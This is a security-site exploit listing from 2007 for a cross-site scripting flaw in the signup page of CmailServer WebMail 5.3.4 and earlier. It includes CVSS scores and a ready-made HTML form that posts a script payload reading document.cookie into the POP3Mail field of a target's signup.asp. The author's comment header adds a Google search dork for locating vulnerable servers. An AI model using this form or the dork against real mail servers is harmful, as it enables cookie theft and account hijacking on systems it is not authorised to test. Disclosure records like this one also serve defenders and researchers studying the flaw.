CmailServer WebMail <= V.5.3.4 (signup) Remote XSS Exploit

2007.04.11
Credit: ajann
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

<html> <head> <script> //'===================================================================== ========================== //'[Script Name: CmailServer WebMail <= V.5.3.4 (signup) Remote XSS Exploit //'[Coded by : ajann //'[Author : ajann //'[Contact : :( //'[Dork : "inurl:/mail/signup.asp" //'[Dork Ex. : http://www.google.com.tr/search?q=inurl:/mail/signup.asp&hl=tr&start=0&s a=N //'[S.Page : http://www.youngzsoft.net/ //'[Using : Please "action" edit and submit //'===================================================================== ========================== </script> </head> <title>Cmail XSS </title> <body> <Form Method="Post" Action="[target]/signup.asp"> <Input Type=Hidden Name=Signup Value="0"> <input type="hidden" name="Account" size="30"> <Input Type="hidden" Name="Pass" size="30" value=""> <Input Type="hidden" Name="RePass" size="30" value=""> <input type="hidden" name="UserName" size="30" value=""> <Input type="hidden" Name="Comment" size="30" value=""> <Input Name="POP3Mail" size="30" value="<script>JavaScript:alert(document.cookie);</script>"> <Input Type="Submit" Value="Submit XSS"> </Form> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top